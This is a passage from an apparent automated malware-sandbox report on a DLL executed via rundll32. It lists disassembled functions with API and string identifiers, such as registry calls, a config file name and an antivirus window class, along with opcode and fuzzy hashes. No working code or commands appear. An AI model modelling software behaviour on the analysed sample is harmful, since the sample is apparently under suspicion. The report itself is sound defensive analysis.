                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressDispatcherErrorExceptionLastProcSleepUser
                                                                                                  • String ID: InitOnceExecuteOnce
                                                                                                  • API String ID: 1145120385-4081768745
                                                                                                  • Opcode ID: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
                                                                                                  • Instruction ID: d97429db02a29b97f0d7b061f75759de830bcf77ba77d21ec7224c84f46128ac
                                                                                                  • Opcode Fuzzy Hash: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
                                                                                                  • Instruction Fuzzy Hash: 4331C63131175881FBDA8B65AC103A92294BB4DBE4F44C225FE6A9B7D4DF3DCA4A8300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180008224 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55registrylibraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCreateHandleModuleProc
                                                                                                  • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                  • API String ID: 1964897782-2994018265
                                                                                                  • Opcode ID: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
                                                                                                  • Instruction ID: ad22b3d90bad73cc844585d5212e8c39d9a41fcfaef769d6902fd1eabb8e997b
                                                                                                  • Opcode Fuzzy Hash: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
                                                                                                  • Instruction Fuzzy Hash: 77210C32619B8482EBA1CB55F8547AAB7A0F7C8BD4F149115EACD07B68CF7CC248CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000E2D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AppendFileModuleNamePathmemset
                                                                                                  • String ID: ..\Config\cloudcfg.dat$cloudcfg.dat
                                                                                                  • API String ID: 1620117007-2349577946
                                                                                                  • Opcode ID: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
                                                                                                  • Instruction ID: ddd92409ecb0ccec80f2ab3f904b9d803dc2e3fbc70a3a57e8900bd834cf0119
                                                                                                  • Opcode Fuzzy Hash: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
                                                                                                  • Instruction Fuzzy Hash: DD216F71204A8881EA91DB11E8443DE7360F78ABD9F90C211FA9947AE9DF7DC74DCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005F320 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32filewindowtimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseFileFindHandleMessageSendTimeoutUnmapViewWindow
                                                                                                  • String ID: Q360SafeMonClass
                                                                                                  • API String ID: 2549143951-79629921
                                                                                                  • Opcode ID: 5a6744058e53387468be0c2847b6ad283791736524b672027be404a340c54278
                                                                                                  • Instruction ID: c32431e1a2230fb89d0ac82bf3fb31adf9d80d138a3069ac5e7463625b7e75da
                                                                                                  • Opcode Fuzzy Hash: 5a6744058e53387468be0c2847b6ad283791736524b672027be404a340c54278
                                                                                                  • Instruction Fuzzy Hash: 7F012C36608B4883EB918F15F95479AB7A1F388BC4F454229EA4943B68DF3CD248CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180074A30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: c2f829957779a5f3283623a795060286876ebd1f64ff5d399dec1781f672f9f2
                                                                                                  • Instruction ID: e395451e8db6c2212d1c7d058d3e5d590d561a96988dee0adbc21a3ed47a46ec
                                                                                                  • Opcode Fuzzy Hash: c2f829957779a5f3283623a795060286876ebd1f64ff5d399dec1781f672f9f2
                                                                                                  • Instruction Fuzzy Hash: 3CF0903120070491EEA28B64A84439A2360FB8C7E1F548619E67A4A2F4CF3DC34DC300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800572CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCountHandleModuleProcTick
                                                                                                  • String ID: GetTickCount64$kernel32
                                                                                                  • API String ID: 1545651562-1084265160
                                                                                                  • Opcode ID: 8336a6a89fcabd28b5c12f94c81a1b388f74c639fd6d2d3507a86c15d1e42b2a
                                                                                                  • Instruction ID: d8b3f425e63f89447d39efc1bc345abebf5d3e6023fccb7d542c747c2b091fce
                                                                                                  • Opcode Fuzzy Hash: 8336a6a89fcabd28b5c12f94c81a1b388f74c639fd6d2d3507a86c15d1e42b2a
                                                                                                  • Instruction Fuzzy Hash: A2F0B731B0164895EA928B54AC493943360B7497B5F909715E87A563F2DF28C79AD700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180018AE8 Relevance: 7.7, APIs: 5, Instructions: 244COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$??3@EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3906572401-0
                                                                                                  • Opcode ID: 8704770b73637da07f2765808fbc5d80e4dde8a3e535cddf5f679fa9373d9d11
                                                                                                  • Instruction ID: 485792f3aa206c277c5c0904b00aba5ea33dd2ed139350c249341fca4c3fabed
                                                                                                  • Opcode Fuzzy Hash: 8704770b73637da07f2765808fbc5d80e4dde8a3e535cddf5f679fa9373d9d11
                                                                                                  • Instruction Fuzzy Hash: 5CB15732B05B448AEB51CFA0A8407DD33F5F748798F144526EE9867B88DF34C65AD354
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180070F00 Relevance: 7.7, APIs: 5, Instructions: 174COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID:
                                                                                                  • API String ID: 2918714741-0
                                                                                                  • Opcode ID: 8b2e5358ef7994b7672dda4e212676a9332a6cdbfea30cd8ee4f2d86f2200a94
                                                                                                  • Instruction ID: 273587a47ae5326c80e6ba55da8392b357747b6508265d18e5e13f97f53468fd
                                                                                                  • Opcode Fuzzy Hash: 8b2e5358ef7994b7672dda4e212676a9332a6cdbfea30cd8ee4f2d86f2200a94
                                                                                                  • Instruction Fuzzy Hash: 7471A572204B88CAE7AA8F19A4403EE77A4FB887D4F148115FE9947BD4DF3AC604C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180071699 Relevance: 7.7, APIs: 5, Instructions: 169COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID:
                                                                                                  • API String ID: 2918714741-0
                                                                                                  • Opcode ID: 33c14279b65a0a1065906a216a7cb17b1be46cdf5c4d3f3d956cece1314462fd
                                                                                                  • Instruction ID: ec8d4e06a79a2d9622380bb27216e65fc7f67728013ab703cf37ba45c655d98d
                                                                                                  • Opcode Fuzzy Hash: 33c14279b65a0a1065906a216a7cb17b1be46cdf5c4d3f3d956cece1314462fd
                                                                                                  • Instruction Fuzzy Hash: CD71B6326047C88AF7B69F69A8403DE77A4F749799F108114EF850BBD9CF798A598B00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180016CA8 Relevance: 7.6, APIs: 5, Instructions: 114COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@memmove$??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 232491532-0
                                                                                                  • Opcode ID: 36aecff153c17e78cc281762afab7df910fd19be64e25fb5c31b0b5d4ec441f6
                                                                                                  • Instruction ID: 28467c757ab6f7ef32b6ddf95ff48fc265dfbbceda238bfa6dff49904db51385
                                                                                                  • Opcode Fuzzy Hash: 36aecff153c17e78cc281762afab7df910fd19be64e25fb5c31b0b5d4ec441f6
                                                                                                  • Instruction Fuzzy Hash: 0C41C432B05B8881EF568B16F9403996361E748BE0F548725AB7A07BE9DF78C6958340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006A658 Relevance: 7.6, APIs: 5, Instructions: 113COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _swprintf_c_l.LIBCMT ref: 000000018006A6B0
                                                                                                  • memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A6DB
                                                                                                  • memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A755
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$_swprintf_c_l
                                                                                                  • String ID:
                                                                                                  • API String ID: 3930809162-0
                                                                                                  • Opcode ID: 4d957fd311e85dbc9e9e1d2fcdfd49009c8516e907acacc0d6bfdbff04455b87
                                                                                                  • Instruction ID: 2e3324a3b5d682f35c297bfefc02d538748b26edc97be9d81ac6111acbd6bae8
                                                                                                  • Opcode Fuzzy Hash: 4d957fd311e85dbc9e9e1d2fcdfd49009c8516e907acacc0d6bfdbff04455b87
                                                                                                  • Instruction Fuzzy Hash: 0A41E33231875496EBA5DA26D90079A67A2BB4DBC0F248015AF1A43F41DE35D6688B40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004D270 Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@memmove$??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 232491532-0
                                                                                                  • Opcode ID: f6402eb9a1989caf2431d562a0b30ecbd21dbfbc94af5b8af8862a8d52686119
                                                                                                  • Instruction ID: 132db3e4afaf743dc264ff4a4633b1d62662e7f67770b965c8017c77268975f6
                                                                                                  • Opcode Fuzzy Hash: f6402eb9a1989caf2431d562a0b30ecbd21dbfbc94af5b8af8862a8d52686119
                                                                                                  • Instruction Fuzzy Hash: 0441B332310B8C81EA65CF69E5843ADA360F749BE4F658716ABBD03BD4CE38D249C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180044CE4 Relevance: 7.6, APIs: 6, Instructions: 110COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$Enter
                                                                                                  • String ID:
                                                                                                  • API String ID: 2978645861-0
                                                                                                  • Opcode ID: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
                                                                                                  • Instruction ID: 73bd4c9cd9396375e0c1b942217bf14bfc10cb3082dae23d56ea31479293823c
                                                                                                  • Opcode Fuzzy Hash: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
                                                                                                  • Instruction Fuzzy Hash: 19413932641B0896FA869F21EC943E83764F749FD9F598115EAA50B3A5CF28C74EC304
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180016090 Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@memmove$??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 232491532-0
                                                                                                  • Opcode ID: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
                                                                                                  • Instruction ID: 3308181ea52ff5a0dd97f5d36b69886329373971ad435e2f25c4df82c4de258d
                                                                                                  • Opcode Fuzzy Hash: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
                                                                                                  • Instruction Fuzzy Hash: 8231D332705B8894EF5ACF16D9443986362F709FE0F588615EE6E07BE6DE78D299C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800161EC Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 0000000180016298
                                                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162A6
                                                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 00000001800162DE
                                                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162E8
                                                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162F6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2321372689-0
                                                                                                  • Opcode ID: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
                                                                                                  • Instruction ID: b2b38ff55e60cbfe57fc328909b4bad170525be2db7207aa5bf6da73de3f6202
                                                                                                  • Opcode Fuzzy Hash: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
                                                                                                  • Instruction Fuzzy Hash: 7831D272700A8891DB569F12E9043DE6351F748FD0F948522EF5E4BBA6DE3CC259C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800442DC Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2321372689-0
                                                                                                  • Opcode ID: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
                                                                                                  • Instruction ID: 762f5997fa826d969e67cf094c143b4ceaf1448be14793aa958531d929a095e6
                                                                                                  • Opcode Fuzzy Hash: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
                                                                                                  • Instruction Fuzzy Hash: 8231A172300E9885D94AEE5286843DCA765F74DFD4F66C521BF680BB96CE38D24AC304
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180057FF0 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
